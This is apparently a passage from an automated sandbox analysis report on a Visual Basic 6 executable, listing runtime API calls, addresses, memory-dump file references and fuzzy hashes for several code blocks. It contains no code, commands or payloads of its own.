                      • __vbaFreeStr.MSVBVM60(0042071F), ref: 00420712
                      • __vbaFreeStr.MSVBVM60 ref: 00420717
                      • __vbaFreeStr.MSVBVM60 ref: 0042071C
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$Free$CheckHresult$MoveNew2$#535#538#557#667Copy
                      • String ID: ~R
                      • API String ID: 1266673281-4090886994
                      • Opcode ID: 0b8b4310f9604500780425a5961d308dd937a191053ea82a90073aa7ace5a4b9
                      • Instruction ID: c94b97940b0d3b648a1696bb6648465a5dad4fb9d6ea2eaef17d4b7ddec19c54
                      • Opcode Fuzzy Hash: 0b8b4310f9604500780425a5961d308dd937a191053ea82a90073aa7ace5a4b9
                      • Instruction Fuzzy Hash: BF515175A00209ABCB14DFA4DD88EDEBBF8FF58701F504526E502B72A0D7746945CF68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 00420029
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420048
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 00420064
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0042007D
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B50,00000048), ref: 0042009A
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C28,000001EC), ref: 004200DA
                      • __vbaFreeStr.MSVBVM60 ref: 004200E3
                      • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004200F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$CheckFreeHresultNew2$List
                      • String ID: ~R
                      • API String ID: 2509323985-4090886994
                      • Opcode ID: 481b8f7c039636d5e0dd0cadf8d3b55b9f7df5cfab4e7503d59f8f0b4130fcf3
                      • Instruction ID: 38f1cf1ab6a561c988aa25ddb9308e814fdb55969018c80ac9b931cb81f2a658
                      • Opcode Fuzzy Hash: 481b8f7c039636d5e0dd0cadf8d3b55b9f7df5cfab4e7503d59f8f0b4130fcf3
                      • Instruction Fuzzy Hash: E4413B70A00214AFDB10DFA8D949F9EBBF8FB08B00F10856AF545F7261D7799945CBA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 00420433
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420452
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0042046E
                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420487
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B30,00000148), ref: 004204AA
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C28,000001EC), ref: 004204EA
                      • __vbaFreeStr.MSVBVM60 ref: 004204F3
                      • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420503
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$CheckFreeHresultNew2$List
                      • String ID: ~R
                      • API String ID: 2509323985-4090886994
                      • Opcode ID: 5c79c81d945f297cfae2348c1f5557278eee59ae5d87e594c935664c692ae270
                      • Instruction ID: 097bd1e6c8dbd51a305641ed9249ee7b03592d727f3c312a8fc954c18729ce93
                      • Opcode Fuzzy Hash: 5c79c81d945f297cfae2348c1f5557278eee59ae5d87e594c935664c692ae270
                      • Instruction Fuzzy Hash: 25314F70A00214AFC710EF68D949F9EBBF8FB08B00F50816AF545F72A1D6789946CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaChkstk.MSVBVM60(?,00401976), ref: 00420DAE
                      • __vbaOnError.MSVBVM60(00000000,?,?,?,?,00401976), ref: 00420DEA
                      • #677.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,40100000,0000000A,0000000A), ref: 00420E30
                      • __vbaFpR8.MSVBVM60 ref: 00420E36
                      • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00420E75
                      • __vbaOnError.MSVBVM60(000000FF,?,?,00401976), ref: 00420E8F
                      • #593.MSVBVM60(0000000A), ref: 00420EAE
                      • __vbaFreeVar.MSVBVM60 ref: 00420EBA
                      • #570.MSVBVM60(000000B2), ref: 00420ED3
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$ErrorFree$#570#593#677ChkstkList
                      • String ID:
                      • API String ID: 520763419-0
                      • Opcode ID: 4cb578577c89bdd3bd5576cc86bd2ab8ada6993498ce39718b94a1699ad81100
                      • Instruction ID: c17dc67dd5b7b213cf664ae01157fa0224927c6ad502b6a4593bc83a41ee4210
                      • Opcode Fuzzy Hash: 4cb578577c89bdd3bd5576cc86bd2ab8ada6993498ce39718b94a1699ad81100
                      • Instruction Fuzzy Hash: 9F3117B0900308EBEB10DF90DA49BDEBBB4FF04744F208159F645BA2A1D7B95A84CF59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041F9E3
                      • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F9FC
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403C28,000001EC), ref: 0041FA44
                      • __vbaFreeObj.MSVBVM60 ref: 0041FA4D
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$CheckFreeHresultNew2
                      • String ID: ~R$Protozoers3
                      • API String ID: 1645334062-28041860
                      • Opcode ID: 3041969da444d25454f22b742f2c8909f70692160ed90cca69e686b698522fdf
                      • Instruction ID: e1f3f7b08d435c252fdb1a5a3817d3278de6dd04fa164589960e2948f5064e67
                      • Opcode Fuzzy Hash: 3041969da444d25454f22b742f2c8909f70692160ed90cca69e686b698522fdf
                      • Instruction Fuzzy Hash: 8F115EB0A40305ABD710EF68CE49F9ABBB8FB08701F108539F545F7690D7789905CBA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __vbaNew2.MSVBVM60(004028C0, ~R), ref: 0041FAC3
                      • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041FADC
                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B74,000001D0), ref: 0041FB1F
                      • __vbaFreeObj.MSVBVM60 ref: 0041FB28
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.2364876993.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364897749.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000004.00000002.2364902120.0000000000424000.00000002.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: __vba$CheckFreeHresultNew2
                      • String ID: ~R
                      • API String ID: 1645334062-4090886994
                      • Opcode ID: 488a9930500eb70c876f90bf563eb5497f453fb6a0344b1974956ecacd96d938
                      • Instruction ID: 85e6d034e2dbb839688450bf1fd3147e6fb3231b18e889acf1ef36d6dbcf42d9
                      • Opcode Fuzzy Hash: 488a9930500eb70c876f90bf563eb5497f453fb6a0344b1974956ecacd96d938
                      • Instruction Fuzzy Hash: 261191B4A00305AFD714DF68CA49F9ABBB8FB08700F10853AF945F3690D7786945CBA9
                      Uniqueness

                      Uniqueness Score: -1.00%